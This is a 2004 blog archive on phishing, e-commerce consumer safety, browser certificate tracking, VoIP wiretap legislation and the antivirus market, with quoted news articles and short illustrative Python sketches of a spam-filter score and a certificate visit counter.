    Unlike the railroad industry, it is unlikely that a massive improvement in consumer safety could result from universal adoption of a few key pieces of technology. Electronic commerce, like the airline industry, has too many points of potential failure for a simple widespread solution. Therefore, we cannot expect technology to come to the rescue.

    The interesting thing about the electrical industry is that it was insurers who moved to form the UL, because insurers paid the costs of electrical catastrophes. At the moment, the costs of electronic commerce failures are being borne by consumers and a wide variety of providers (banks, retailers, etc.). The lesson here is that an industry bearing the costs of failure in another industry can act in concert to compel improvements in consumer safety.

    Coming lastly to the automotive industry, we can see a parallel in that weak consumer safety in electronic commerce is largely viewed as a cost of doing business. Most consumers recognize that risks exist, however unknowable, yet accept this as the cost of conducting business online. Electronic commerce failures do not make front page news; however, we can expect that consumer interest groups and politicians will be making headlines with statistics of people harmed by electronic commerce. Perhaps the electronic commerce industry will come under fire from lawyers who can easily identify large groups of consumers *harmed* by rich software development companies.

    Looking Forward

    From the foregoing, we can see that consumer adoption of electronic commerce will be hampered until consumers perceive that a higher level of safety is provided. We can expect no silver bullet in terms of technology. We can expect -- absent credible efforts by the industry to self-regulate -- that politicians will come under increasing pressure to regulate electronic commerce. The software industry powers will work to thwart that pressure; however, they may be unsuccessful -- especially when one considers the power wielded by the big three automakers during the 1960's.

    The question is, will the industry move to self-regulate before government moves in? In my opinion, the best hope for self-regulation lies in parallel industries -- especially banking. I believe it is unlikely that software providers will commonly agree that improved consumer safety would lead to revenue growth for all. On the other hand, industries such as banking are bearing an increasing share of the costs of failures in electronic commerce, and those that bear the costs are likely to move in concert -- as did the insurers in forming the UL. If pressure were brought to bear, I think these adjacent industries might bring the best results in terms of self-regulation.

    So, we are left rolling our own, until either government or adjacent industries step in to create standards for consumer safety regarding electronic commerce. Our only hope for preventing onerous government regulation lies in convincing these adjacent industries that by acting in concert, they can reduce their costs by improving consumer safety on the Internet.

    Posted by iang at 03:48 AM | Comments (1) | TrackBack

    June 30, 2004

    Question on the state of the security industry

    A question I posed on the cryptography mailing list: The phishing thing has now reached the mainstream, with the epidemic proportions that were feared and predicted on this list over the last year or two. Many of the "solution providers" are bailing in with ill-thought-out tools, presumably in the hope of cashing in on a buying splurge, and hoping to turn the result into lucrative cash flows.

    Sorry, the question's embedded further down...

    In other news, Verisign just bailed in with a service offering [1]. This is quite cunning, as they have offered the service primarily as a spam protection service, with a nod to phishing. In this way they have something, a toe in the water, but they avoid the embarrassing questions about whatever happened to the last security solution they sold.

    Meanwhile, the security field has been deathly silent. (I recently had someone from the security industry authoritatively tell me phishing wasn't a problem ... because the local plod said he couldn't find any!)

    Here's my question - is anyone in the security field of any sort of repute being asked about phishing, consulted about solutions, contracted to build? Anything?

    Or, are security professionals as a body being totally ignored in the first major financial attack that belongs totally to the Internet?

    What I'm thinking of here is Scott's warning of last year [2]:

    Subject: Re: Maybe It's Snake Oil All the Way Down
    At 08:32 PM 5/31/03 -0400, Scott wrote:
    ...
    >When I drill down on the many pontifications made by computer
    >security and cryptography experts all I find is given wisdom.  Maybe
    >the reason that folks roll their own is because as far as they can see
    >that's what everyone does.  Roll your own then whip out your dick and
    >start swinging around just like the experts.

    I think we have that situation. For the first time we are facing a real, difficult security problem. And the security experts have shot their wad.

    Comments?

    iang


    [1] Lynn Wheeler's links below if anyone is interested:
    VeriSign Joins The Fight Against Online Fraud
    http://www.informationweek.com/story/showArticle.jhtml;jsessionid=25FLNINV0L5DCQSNDBCCKHQ?articleID=22102218
    http://www.infoworld.com/article/04/06/28/HNverisignantiphishing_1.html
    http://zdnet.com.com/2100-1105_2-5250010.html
    http://news.com.com/VeriSign+unveils+e-mail+protection+service/2100-7355_3-5250010.html?part=rss&tag=5250010&subj=news.7355.5


    [2] Sorry, I couldn't find the original email, but here's the thread, rooted at:
    http://www.mail-archive.com/cpunks@minder.net/msg01435.html

    Posted by iang at 06:55 AM | Comments (9) | TrackBack

    June 25, 2004

    Forging the Euro

    Anecdotally, it seems that now that Europe has a world-class currency, it has attracted world-class forgers [1]. Perhaps catching the Issuer by surprise, the ECB and its satellites are facing significant efforts at injecting false currency. Oddly enough, the Euro note is very nice, and hard to forge. Which makes the claim that only the special note departments in the central banks can tell the forgeries quite a surprise.

    Still, the amounts are tiny. I've heard estimates that 30% of the dollar issue washing around the poorer regions is forged, so it doesn't seem as though the gnomes in Frankfurt have much to complain about as yet.

    And it has to be taken as an accolade of sorts: if a currency is good, it is worth forging. Something we discovered in the digital cash world was that attacks against a system don't start until the issuer has moved about a million worth in float, and has a thousand or so users. Until then, the crooks haven't got the mass to hide in; with some of these smaller systems, "everyone knows everyone", and that's a bit limiting if you are trying to fence some value through the market makers.

    [1] http://www.dw-world.de/english/0,3367,1431_A_1244689_1_A,00.html

    Posted by iang at 07:33 AM | Comments (0) | TrackBack

    June 23, 2004

    Phishing II - Front Page News

    As well as the FT review, in a further sign that phishing is on track to become a serious threat to the Internet, Google yesterday covered phishing on its news front page. 37 articles in one day didn't make it a top story, but all the signs point to increasing paranoia. If you "search news" you get about 932 stories.

    It's mainstream news. Which is in itself an indictment of the failure of Internet security, a field that continues to reject phishing as a threat.

    Let's recap. There are about three lines of potential defense: the user's mailer, the user's browser, and the user herself.

    (We can pretty much rule out the server, because that's bypassed by this MITM; some joy would be experienced using IP number tracking, but that can be bypassed too, and it may be more trouble than it's worth. We can also pretty much rule out authentication, as scammers who steal hundreds of thousands have no trouble stealing keys. Also in the bit bucket are the various strong URL schemes, which would help, but only once they have reached critical mass. No hope there.)

    In turn, here's what they can do against phishing:

    The user's mailer can only do so much here - its job is to take emails, and that's what it does. It has no way of knowing that an email is a phishing attack, especially if the email carefully copies a real one. Bayesian filters might help, but they are also testable, and they can be beaten by the committed attacker - which a phisher is. Spam tech is not the right way of thinking: if one spam slips through, we don't mind, but if one phish slips through, we care a lot (especially if we believe the 5% hit rate).
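
    (To see why "testable" matters: a filter's scoring is deterministic, so a phisher can run drafts through the same sort of filter until one passes. A toy sketch, with invented token probabilities:)

        # Toy Graham-style Bayesian spam score; the token probabilities are
        # invented for illustration. Because the computation is deterministic,
        # a phisher can tune a draft until it scores below the block threshold.
        from math import prod

        p_spam = {"verify": 0.90, "account": 0.80, "urgent": 0.95}

        def score(tokens, default=0.4):
            s = prod(p_spam.get(t, default) for t in tokens)
            h = prod(1 - p_spam.get(t, default) for t in tokens)
            return s / (s + h)

        print(score(["verify", "account", "urgent"]))     # ~0.999: blocked
        print(score(["regarding", "your", "statement"]))  # ~0.23: slips through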

    Likewise, the user is not so savvy. Most users are going to have trouble picking the difference between a real email and a fake one, or a real site and a fake one. It doesn't help that even real emails and sites have lots of subtle problems that cause confusion. So I'd suggest that relying on the user to deal with this is a loser. The more checking the better, and the more knowledge the better, but this isn't going to address the problem.

    This leaves the browser. Luckily, in any important relationship, the browser knows, or can know, some things about that relationship. How many times visited, what things done there, etc etc. All the browser has to do then is to track a little more information, and make the user aware of that information.

    But to do that, the browsers must change. They've got to change in 3 of these 4 ways:

    1. cache certificate use statistics and other information, on a certificate and URL basis. Some browsers already cache some info - this is no big deal.
    2. display the vital statistics of the connection in a chrome (protected) area - especially the number of visits. This we call the branding box (a sketch of the bookkeeping appears below). It represents a big change to the browser security model, but, for various reasons, all users of browsers are going to benefit.
    3. accept self-signed certs as *normal* security, again displayed in the chrome. This is essential to get people used to seeing many more cert-protected sessions, so that the above two parts can start to work.
    4. servers should bootstrap, as normal default behaviour, using an on-demand generated self-signed cert. Only when it is routine for certs to exist for *any* important website will the browser be able to reliably track persistency, and the user start to understand the importance of keeping an eye on that persistency.

    It's not a key/padlock, it's a number. Hey presto, we *can* teach the user what a number means - it's the number of times you've visited BankofAmerica.com, or FunkofAmericas.co.mm, or wheresoever you are heading. If that doesn't seem right, don't enter in any information.

    These are pretty much simple changes, and the best news is that Ye & Smith's "Trusted Paths for Browsers" showed that this was totally plausible.
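
    For the curious, here is a minimal sketch of the bookkeeping behind points 1 and 2 - a persistent visit counter keyed by site and certificate, which is all the branding box needs. The storage format and names are my own illustration, not any browser's actual code:

        # Persist a visit count per (host, certificate) pair so the chrome can
        # display "you have visited this site N times with this certificate".
        # A count of 1 for a familiar host means a new cert - exactly the
        # signal the user should treat with suspicion.
        import hashlib, json, os

        STORE = "cert_stats.json"

        def record_visit(host: str, cert_der: bytes) -> int:
            fp = hashlib.sha256(cert_der).hexdigest()
            stats = json.load(open(STORE)) if os.path.exists(STORE) else {}
            key = host + "|" + fp
            stats[key] = stats.get(key, 0) + 1
            with open(STORE, "w") as f:
                json.dump(stats, f)
            return stats[key]

        n = record_visit("bankofamerica.com", b"...DER bytes...")
        print("Visits with this certificate:", n)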

    Posted by iang at 10:59 AM | Comments (0) | TrackBack

    Phishing I - Penny Black leads to Billion Dollar Loss

    Today, the Financial Times leads its InfoTech review with phishing [1]. The FT has new stats: Brightmail reports 25 unique phishing scams per day. Average amount shelled out for 62m emails by corporates that suffer: $500,000. And, 2.4bn emails seen by Brightmail per month - with a claim that they handle 20% of the world's mail. Let's work those figures...

    That means 12bn scam emails per month worldwide. If 62m emails cause costs of half a million, that works out at $0.008 per email. 144bn emails per year makes for ... $1.152 billion paid out every year [2].
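
    (For those who want to check the arithmetic, here it is spelled out, using the figures as reported:)

        # Reworking the FT/Brightmail figures quoted above.
        seen_per_month = 2.4e9     # scam emails Brightmail sees per month
        market_share = 0.20        # Brightmail's claimed share of the world's mail
        world_per_month = seen_per_month / market_share   # 12bn per month

        cost_per_email = round(500_000 / 62e6, 3)         # $0.008 per email
        world_per_year = world_per_month * 12             # 144bn per year
        print(world_per_year * cost_per_email)            # 1.152e9 = $1.152bn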

    In other words, each phishing email is generating losses to business of a penny. Black indeed - nobody has been able to show such a profit model from email, so we can pretty much guarantee that the flood is only just beginning.

    (The rest of the article included lots of cartels trying to peddle solutions, and a mention that the IETF thinks email authentication might help. Fat chance of that, but it did mention one worrying development - phishers are starting to use viral techniques to infect the user's PC with key loggers. That's very worrying, as there is no way a program can defeat something that the Microsoft operating system permits to invade.)

    [1] The Financial Times, London, 23rd June 2004,
    "Gone phishing," FT-IT Review.
    [2] Compare and contrast this 1 billion dollar loss to the $5bn claimed by NYT last week:
    "Phishing an epidemic, Browsers still snoozing"
    http://www.financialcryptography.com/mt/archives/000153.html



    Addendum 2004-07-17: One article reports that phishing will cost financial firms $400m in 2004, and another article, "Firms hit hard by identity theft", reports:

    "While it's difficult to pin down an exact dollar amount lost when identity thieves strike such institutions, Jones said 20 cases that have been proposed for federal prosecution involve $300,000 to $1 million in losses each."

    This matches the amount reported in the Texas phishing case, although it refers to identity theft, not phishing (yes, they are not the same).



    Addendum 2004-07-27: Amir Herzberg and Ahmad Gbara report in their draft paper:
    A study by Gartner Research [L04] found that about two million users gave such information to spoofed web sites, and that "Direct losses from identity theft fraud against phishing attack victims -- including new-account, checking account and credit card account fraud" cost U.S. banks and credit card issuers about $1.2 billion last year.

    [L04] Avivah Litan, Phishing Attack Victims Likely Targets for Identity Theft, Gartner FirstTake, FT-22-8873, Gartner Research, 4 May 2004



    Addendum 2008-09-03 Fighting Phish, Fakes and Frauds talks about additional support calls costs and users who depart from ecommerce.

    Posted by iang at 10:30 AM | Comments (1) | TrackBack

    June 18, 2004

    FBI asks US Congress to repeal laws of physics

    In our world, we are very conscious of the natural order of life. First comes physics. From physics is derived economics, or the natural costing of things. And finally, law cleans up, adding things like dispute resolution (us techies call them edge cases). Notwithstanding that this ordering has been proven over any millennium you care to pick, sometimes, more often than is merited, people ask lawmakers to ignore the reality of life and to regulate certain inevitable behaviours into some sort of limbo of illegal normality.

    Such it is with Internet telephony, also known as VOIP (voice over IP): Internet machines are totally uncontrollable, at a basic fundamental physical level. It was designed that way, and the original architects forgot to include the flag for legislative override. Further, Internet machines can do voice communications.

    From those two initial assumptions, we can pretty much conclude that any attempt to regulate VOIP will fail. And that all the perks now enjoyed by large dominating parties of power (e.g., governments) will fade away.

    Yet, the US Department of Justice is asking Congress to regulate wiretaps on VoIP [1]. This looks like a repeat of the crypto wars of the 90s. Almost lost and definitely bungled by the FBI, the crypto wars were won by the NSA and its rather incredible sense of knowing when to ease off a bit.

    Reading the article below, one of two by Declan McCullagh, it is at least hopeful to see that Congressmen are starting to express a bipartisan skepticism towards the nonsense dished up in the name of terrorism. Why don't the DoJ and its primary arm, the FBI, "get it"? It's unclear, but when a police force decides that protecting the faltering revenues of Hollywood is its 3rd biggest priority [2], another unwinnable battle against physics, one can only expect more keystone cops action in the future [3].

    Here's the pop quiz of the week - what technologies can be thought to "aid, abet, induce, counsel or procure" violation of copyright? There is no prize for photocopying, laser printers, cassette recorders, CD and DVD burners, PCs, software, cameras, phones, typewriters ... Surely we can come up with something that is an innovative inducer of the #3 crime - copyright violation?

    [1] Declan McCullagh, Feds: VoIP a potential haven for terrorists
    http://zdnet.com.com/2102-1105_2-5236233.html?tag=printthis
    [2] http://www.financialcryptography.com/mt/archives/000072.html does record where:
    FBI weighs into anti-piracy fight
    http://newsvote.bbc.co.uk/mpapps/pagetools/print/news.bbc.co.uk/1/hi/entertainment/music/3506301.stm
    [3] Declan McCullagh, Antipiracy bill targets technology
    http://news.com.com/2102-1028_3-5238140.html?tag=st.util.print



    Feds: VoIP a potential haven for terrorists
    By Declan McCullagh CNET News.com June 16, 2004, 10:54 AM PT

    WASHINGTON--The U.S. Department of Justice on Wednesday lashed out at Internet telephony, saying the fast-growing technology could foster "drug trafficking, organized crime and terrorism."

    Laura Parsky, a deputy assistant attorney general in the Justice Department, told a Senate panel that law enforcement bodies are deeply worried about their ability to wiretap conversations that use voice over Internet Protocol (VoIP) services.

    "I am here to underscore how very important it is that this type of telephone service not become a haven for criminals, terrorists and spies," Parsky said. "Access to telephone service, regardless of how it is transmitted, is a highly valuable law enforcement tool."

    Police have been able to conduct Internet wiretaps for at least a decade, and the FBI's controversial Carnivore (also called DCS1000) system was designed to facilitate online surveillance. But Parsky said that discerning "what the specific (VoIP) protocols are and how law enforcement can extract just the specific information" are difficult problems that could be solved by Congress requiring all VoIP providers to build in backdoors for police surveillance.

    The Bush administration's request was met with some skepticism from members of the Senate Commerce committee, who suggested that it was too soon to impose such weighty regulations on the fledgling VoIP industry. Such rules already apply to old-fashioned telephone networks, thanks to a 1994 law called the Communications Assistance for Law Enforcement Act (CALEA).

    "What you need to do is convince us first on a bipartisan basis that there's a problem here," said Sen. Ron Wyden, D-Ore. "I would like to hear specific examples of what you can't do now and where the law falls short. You're looking now for a remedy for a problem that has not been documented."

    Wednesday's hearing was the first to focus on a bill called the VoIP Regulatory Freedom Act, sponsored by Sen. John Sununu, R-N.H. It would ban state governments from regulating or taxing VoIP connections. It also says that VoIP companies that connect to the public telephone network may be required to follow CALEA rules, which would make it easier for agencies to wiretap such phone calls.

    The Justice Department's objection to the bill is twofold: Its wording leaves too much discretion with the Federal Communications Commission, Parsky argued, and it does not impose wiretapping requirements on Internet-only VoIP networks that do not touch the existing phone network, such as Pulver.com's Free World Dialup.

    "It is even more critical today than (when CALEA was enacted in 1994) that advances in communications technology not provide a haven for criminal activity and an undetectable means of death and destruction," Parsky said.

    Sen. Frank Lautenberg, D-N.J., wondered if it was too early to order VoIP firms to be wiretap-friendly by extending CALEA's rules. "Are we premature in trying to tie all of this down?" he asked. "The technology shift is so rapid and so vast."

    The Senate's action comes as the FCC considers a request submitted in March by the FBI. If the request is approved, all broadband Internet providers--including companies using cable and digital subscriber line technology--will be required to rewire their networks to support easy wiretapping by police.

    Wednesday's hearing also touched on which regulations covering 911 and "universal service" should apply to VoIP providers. The Sununu bill would require the FCC to levy universal service fees on Internet phone calls, with the proceeds to be redirected to provide discounted analog phone service to low-income and rural American households.

    One point of contention was whether states and counties could levy taxes on VoIP connections to support services such as 911 emergency calling. Because of that concern, "I would not support the bill as drafted and I hope we would not mark up legislation at this point," said Sen. Byron Dorgan, D-N.D.

    Sen. Conrad Burns, R-Mont., added: "The marketplace does not always provide for critical services such as emergency response, particularly in rural America. We must give Americans the peace of mind they deserve."

    Some VoIP companies, however, have announced plans to support 911 calling. In addition, Internet-based phone networks have the potential to offer far more useful information about people who make an emergency call than analog systems do.



    Antipiracy bill targets technology

    By Declan McCullagh Staff Writer, CNET News.com

    A forthcoming bill in the U.S. Senate would, if passed, dramatically reshape copyright law by prohibiting file-trading networks and some consumer electronics devices on the grounds that they could be used for unlawful purposes.

    A bill called the Induce Act is scheduled to come before the Senate sometime next week. If passed, it would make whoever "aids, abets, induces (or) counsels" copyright violations liable for those violations.

    Bottom line: If passed, the bill could dramatically reshape copyright law by prohibiting file-trading networks and some consumer electronics devices on the grounds that they could be used for unlawful purposes.

    The proposal, called the Induce Act, says "whoever intentionally induces any violation" of copyright law would be legally liable for those violations, a prohibition that would effectively ban file-swapping networks like Kazaa and Morpheus. In the draft bill seen by CNET News.com, inducement is defined as "aids, abets, induces, counsels, or procures" and can be punished with civil fines and, in some circumstances, lengthy prison terms.

    The bill represents the latest legislative attempt by influential copyright holders to address what they view as the growing threat of peer-to-peer networks rife with pirated music, movies and software. As file-swapping networks grow in popularity, copyright lobbyists are becoming increasingly creative in their legal responses, which include proposals for Justice Department lawsuits against infringers and action at the state level.

    Originally, the Induce Act was scheduled to be introduced Thursday by Sen. Orrin Hatch, R-Utah, but the Senate Judiciary Committee confirmed at the end of the day that the bill had been delayed. A representative of Senate Majority Leader Bill Frist, a probable co-sponsor of the legislation, said the Induce Act would be introduced "sometime next week," a delay that one technology lobbyist attributed to opposition to the measure.

    Though the Induce Act is not yet public, critics are already attacking it as an unjustified expansion of copyright law that seeks to regulate new technologies out of existence.

    "They're trying to make it legally risky to introduce technologies that could be used for copyright infringement," said Jessica Litman, a professor at Wayne State University who specializes in copyright law. "That's why it's worded so broadly."

    Litman said that under the Induce Act, products like ReplayTV, peer-to-peer networks and even the humble VCR could be outlawed because they can potentially be used to infringe copyrights. Web sites such as Tucows that host peer-to-peer clients like the Morpheus software are also at risk for "inducing" infringement, Litman warned.

    Jonathan Lamy, a spokesman for the Recording Industry Association of America, declined to comment until the proposal was officially introduced.

    "It's simple and it's deadly," said Philip Corwin, a lobbyist for Sharman Networks, which distributes the Kazaa client. "If you make a product that has dual uses, infringing and not infringing, and you know there's infringement, you're liable."

    The Induce Act stands for "Inducement Devolves into Unlawful Child Exploitation Act," a reference to Capitol Hill's frequently stated concern that file-trading networks are a source of unlawful pornography. Hatch is a conservative Mormon who has denounced pornography in the past and who suggested last year that copyright holders should be allowed to remotely destroy the computers of music pirates.

    Foes of the Induce Act said that it would effectively overturn the Supreme Court's 1984 decision in the Sony Corp. v. Universal City Studios case, often referred to as the "Betamax" lawsuit. In that 5-4 opinion, the majority said VCRs were legal to sell because they were "capable of substantial noninfringing uses." But the majority stressed that Congress had the power to enact a law that would lead to a different outcome.

    "At a minimum (the Induce Act) invites a re-examination of Betamax," said Jeff Joseph, vice president for communications at the Consumer Electronics Association. "It's designed to have this fuzzy feel around protecting children from pornography, but it's pretty clearly a backdoor way to eliminate and make illegal peer-to-peer services. Our concern is that you're attacking the technology."

    Posted by iang at 03:56 PM | Comments (6) | TrackBack

    June 17, 2004

    Not news - AV producers slip as Microsoft "competes"

    Sometimes you see a business pattern like this: A company or government doesn't do its job. So up springs a service sector to fill the gap. After a while, everyone starts to think that's the natural state of affairs, but the canny business types know that these service providers are very vulnerable.

    Such is the case here [1]. When Microsoft started talking about providing its own anti-virus product, shares in Symantec and presumably other anti-virus (AV) producers started sliding.

    Hey ho, where's the news? Microsoft delivers a product that is weak on the security side, and strong on the user side. Now they've started working on security, and the turnaround has been painful and noisy, if not exactly measurable in progress terms.

    Any investor in Symantec or any similar anti-virus producer must have been able to connect the dots in Bill Gates' famous memo, from security to viruses. Of course the mission would include reducing the vulnerability to viruses, and of course there would be some serious thought given to two possibilities: writing the code such that viruses aren't a threat (why do we need to say this?) and creating an in-house AV product so the synergies could be exploited.

    The latter is a stop-gap measure. But so is Symantec's anti-virus division: it's only there because Microsoft doesn't write good code. The day Microsoft stops this egregious practice is the day we no longer need Symantec to take $100 out of our pockets for Microsoft's laziness.

    Of course, the state of understanding in the security industry is woefully underscored by the claim that Microsoft needs to sell it separately rather than bundle it. Since when is it anti-trust to deliver a secure product? And who in Microsoft legal hasn't worked out that if they sell on the one hand a broken product, and on the other a fix for the same, the class action attorneys are going to skip breakfast to get that one filed?

    [1] http://www.thestreet.com/tech/ronnaabramson/10166284.html
    Symantec Wobbled by Microsoft Threat



    Symantec Wobbled by Microsoft Threat

    By Ronna Abramson TheStreet.com Staff Reporter 6/16/2004 2:47 PM EDT

    Shares of Symantec (SYMC:Nasdaq - news - research) continued their recent slide Wednesday amid more definitive news that Microsoft (MSFT:Nasdaq - news - research) plans to enter its thriving antivirus software market.

    Shares of security titan Symantec were recently down $1.60, or 3.8%, to $40.82. The stock has shed about 7% since Friday's close, while the Nasdaq Composite has inched down less than 0.5% during the same period.

    Shares of security rival Network Associates (NET:NYSE - news - research), another beneficiary of virus outbreaks, have declined 2.6% since Friday. Shares were recently down 20 cents, or 1.2%, at $16.72. Microsoft stock was recently off 17 cents, or 0.6%, to $27.24.

    Thanks to the anti-virus market, Symantec defied the economic downturn as other tech names were struggling. In April, the company's stock hit an all-time intraday high of $50.88.

    But Symantec shares began to tumble Monday after wire services wrote that Mike Nash, chief of Microsoft's security business unit, said at a dinner with reporters that the world's largest software maker is developing its own anti-virus products that will compete against Symantec and Network Associates.

    "We're still planning to offer our own [antivirus] product," Reuters quoted Nash as saying.

    Those comments came just two weeks after another Microsoft executive, Rich Kaplan, corporate vice president of security business and technology marketing, said the company was still undecided about what it would do with antivirus technology acquired last year from a Romanian security firm.

    Kaplan was not available for comment Wednesday. Instead, Amy Carroll, director of Microsoft's security business and technology unit, confirmed Nash's comments and Microsoft's intentions to enter the antivirus space in a telephone interview Wednesday.

    "What Mike said is not new," Carroll said. "Our plan is to offer an AV [antivirus] solution." The company has not yet announced a timeline for when the antivirus product will debut or details on exactly what shape it will take.

    Microsoft plans to offer an antivirus product or service for a fee, but will not bundle it with its ubiquitous Windows operating system, she added.

    Analysts have suggested that such bundling would undoubtedly raise antitrust eyebrows, given that Microsoft has been the subject of suits both in the U.S. and Europe, where regulators are still fighting the software behemoth over the bundling of its media player with Windows.

    Observers have offered plenty of reasons why they believed Microsoft would not enter the field. Chris Bonavico, a portfolio manager with Transamerica Investment Management, has suggested one reason Microsoft will not jump into the space is because security is a services business that requires around-the-clock responses to new attacks, and Microsoft isn't a services company.

    But Carroll said Wednesday that Microsoft already has a team called the Microsoft Security Response Center that monitors potential security threats to customers 24 hours a day, seven days a week.

    Meanwhile, others have suggested consumers and enterprises will stick with third-party antivirus vendors even if Microsoft launches its own competing product, especially given Microsoft's spotty security record to date.

    "In the consumer market, they [customers] may not be as savvy," said Tony Ursillo, an analyst with Loomis, Sayles & Co., which holds Symantec shares. But "I don't know if at least corporate customers will want to buy a product that patches the holes of another product sold by the same company."

    "I think it will be tricky" for Microsoft, Ursillo added.

    Posted by iang at 02:58 AM | Comments (4) | TrackBack

    June 15, 2004

    Phishing an epidemic, Browsers still snoozing

    Phishing, the sending of spoofed emails to trick you into revealing the login passphrase you type into your browser, now seems to be the #1 threat to Internet users. A dubious award, indeed. An article in the New York Times claims that online identity theft caused damages of $5 billion worldwide, while spamming cost a mere $3.5 billion [1]. That was last year, and phishing was just a sniffle then. Expect something like $20-30 billion this year from phishing, as now we're facing an epidemic [2].

    That article also mentions that 5-20% of these emails work - the victim clicks through using that nice browser-email feature and enters their hot details into the bogus password harvesting site.

    Reported elsewhere today [3]:

    "Nearly 2 million Americans have had their checking accounts raided by criminals in the past 12 months, according to a soon-to-be released survey by market research group Gartner. Consumers reported an average loss per incident of $1,200, pushing total losses higher than $2 billion for the year."
    "Gartner researcher Avivah Litan blamed online banking for most of the problem."

    A recent phishing case in a Texas court gave something like $200 damages per victim [4]. That's a court case - so the figures can have some credibility. The FTC reports an average loss rate of about $5300 per victim for all identity theft [5].

    So we are clearly into the many, many millions of dollars of damage. It is not out of the question that we are reaching for the billion dollar mark, especially if we add in the associated costs. The FTC reported about $53b of losses last year; while most identity theft is non-Internet-related, it only needs to be 10% of the total to look like the NYT's figure of $5bn, above.
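
    (Spelled out - the 10% Internet share is the assumption doing the work:)

        # Plausibility check on the NYT figure, using the FTC number above.
        ftc_total = 53e9           # FTC: about $53bn in identity theft losses
        internet_share = 0.10      # assume 10% of identity theft is Internet-based
        print(ftc_total * internet_share / 1e9)   # 5.3, i.e. about the NYT's $5bn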

    Let's get our skepticism up front here: I don't believe these figures. Firstly, they are reported quite loosely, with no backing; there is no pretence at academic seriousness. Secondly, they seem to derive from a bunch of vested-interest players, such as mi2g.com and the Anti-Phishing Working Group (both being peddlers of some sort of solution). Oh, and here's another group [6].

    We know that there is a shortage of reliable figures to go on. Having said that, even if the figures are way off, we still have a conclusion:

    This is real money, folks!

    Wake up time! This is actual fraud, money being taken from real average Internet users, people who download the email programs and browsers and web servers that many of us worked on and used. Forget the hypothetical attacks postulated by Internet security experts a decade or so back. Those attacks were not real, they were a figment of some academic's imagination.

    The security model built in to standard browsing is broken. Get over it, guys.

    Every year from 2003 onwards, Americans will lose more money than was ever paid out to CAs for those certificates meant to protect them from the MITM [7]. By the end of this year, Americans will have been defrauded - I predict - to the same extent as Verisign's peak in market cap.

    The secure browser falls to the MITM in three ways that I know of - phishing, click-thru syndrome, and the substitute CA.

    The new (since 2002) phishing attack is a classical MITM that breaches secure browsing. This attack convinces some users to go to an MITM site. It's what happens when a false sense of security goes on too long. The fact that secure browsing falls to the MITM is unfortunate, but what's really sad is that the Internet security community declines to accept the failure of the SSL/CA/secure-browsing model.

    Until this failure is recognised, there is no hope of moving on. What needs to be done is to realise that the browser is the front line of defence for the user - it's the only agent that knows anything about the user's browsing activity, and it's the only agent that can tell a new spoof site from an old, well-used and thus trusted site.

    Internet security people need to wind the clock forward by about a decade and start thinking about how to protect ordinary Internet users from the billions of dollars being taken from their pockets. Or not, as the case may be. But, in the meantime, let's just accept that the browser has a security model worth diddly squat. And start thinking about how to fix it.

    [1] New York Times, Online crime engenders a new hero: cybersleuth, 11th June 2004. (below)
    [2] Epidemic is defined as more than one article on an Internet fraud in Lynn Wheeler's daily list.
    http://seattlepi.nwsource.com/business/apbiz_story.asp?category=1310&slug=Japan%20Citibank
    http://www.epaynews.com/index.cgi?survey=&ref=browse&f=view&id=1087301938622215212&block=
    florida cartel stole identities of 1100 cardholders
    http://www.msnbc.msn.com/id/5184077/
    [3] http://www.msnbc.msn.com/id/5184077/
    Survey: 2 million bank accounts robbed
    [4] http://www.financialcryptography.com/mt/archives/000129.html
    "Cost of Phishing - Case in Texas"
    [5] http://www.ftc.gov/opa/2003/09/idtheft.htm
    FTC Releases Survey of Identity Theft in U.S.
    [6] http://www.reuters.com/financeNewsArticle.jhtml?type=governmentFilingsNews&storyID=5429333&section=investing
    Large companies form group to fight "phishing"
    [7] Identity Theft - the American Disease
    http://www.financialcryptography.com/mt/archives/000146.html


    Online crime engenders a new hero: cybersleuth
    Christopher S. Stewart NYT

    Friday, June 11, 2004

    A lot of perfectly respectable small businesses are raking in money from
    Internet fraud.

    From identity theft to bogus stock sales to counterfeit prescription drugs,
    crime is rife on the Web. But what has become the Wild West for savvy
    cybercriminals has also developed into a major business opportunity for
    cybersleuths.

    The number of security companies that patrol the shady corners of the
    virtual world is small but growing.

    "As more and more crime is committed on the Internet, there will be growth
    of these services," said Rich Mogull, research director for information
    security and risk at Gartner, a technology-market research firm in Stamford,
    Connecticut.

    ICG, a Princeton, New Jersey, company founded in 1997, has grown to 35
    employees and projected revenue of $7 million this year from eight employees
    and $1.5 million in revenue just four years ago, said Michael Allison, its
    founder and chief executive.

    ICG, which is licensed as a private investigator in New Jersey, tracks down
    online troublemakers for major corporations around the world, targeting
    spammers and disgruntled former employees as well as scam artists, using
    both technology and more traditional cat-and-mouse tactics.

    "It's exciting getting into the hunt," said Allison, a 45-year-old British
    expatriate. "You never know what you're going to find. And when you identify
    and finally catch someone, it's a real rush."

    According to Mi2g, a computer security firm, online identity theft last year
    cost businesses and consumers more than $5 billion worldwide, while spamming
    drained $3.5 billion from corporate coffers. And those numbers are climbing,
    experts say.

    "The Internet was never designed to be secure," said Alan Brill, senior
    managing director at Kroll Ontrack, a technology services provider that was
    set up in 1985 by Kroll Associates, an international security company based
    in New York. "There are no guarantees."

    Kroll has seven crime laboratories around the world and is opening two more
    in the United States because of the growing demand for such work.

    ICG clients, many of whom Allison will not identify because of privacy
    agreements, include pharmaceutical companies, lawyers, financial
    institutions, Internet service providers, digital entertainment groups and
    telecommunication giants.

    One of the few cases that ICG can talk about is a spamming problem that
    happened a few years ago at Ericsson, the Swedish telecommunications
    company. Hundreds of thousands of e-mail messages promoting a telephone-sex
    service inundated its servers hourly, crippling the system.

    "They kept trying to filter it out," said Jeffrey Bedser, ICG chief
    operating officer. "But the spam kept on morphing and getting around the
    filter."

    Bedser and his team plugged the spam message into search engines and located
    other places on the Web where it appeared. Some e-mail addresses turned up,
    which led to a defunct e-fax Web site. And that Web site had in its registry
    the name of the spammer, who turned out to be a middle-aged man living in
    the Georgetown section of Washington.

    Several weeks later, the man was sued. He ultimately agreed to a $100,000
    civil settlement, though he didn't go away, Bedser said.

    "The guy sent me an e-mail that said, 'I know who you are and where you
    are,'" Bedser recalled. "He also signed me up for all kinds of spam and I
    ended up getting flooded with e-mail for sex and drugs for the next year."

    Allison says ICG's detective work is, for the most part, unglamorous,
    involving mostly sitting in front of computers and "looking for ones and
    zeros." Still, there are some private-eye moments. Computer forensic work,
    for instance, takes investigators to corporate offices all over America,
    sometimes in the dead of night.

    Searching through the hard drives of suspects - always with a company lawyer
    or executive present - the investigators hunt for "vampire data," or old
    e-mails and documents that the computer users thought they had deleted long
    ago.

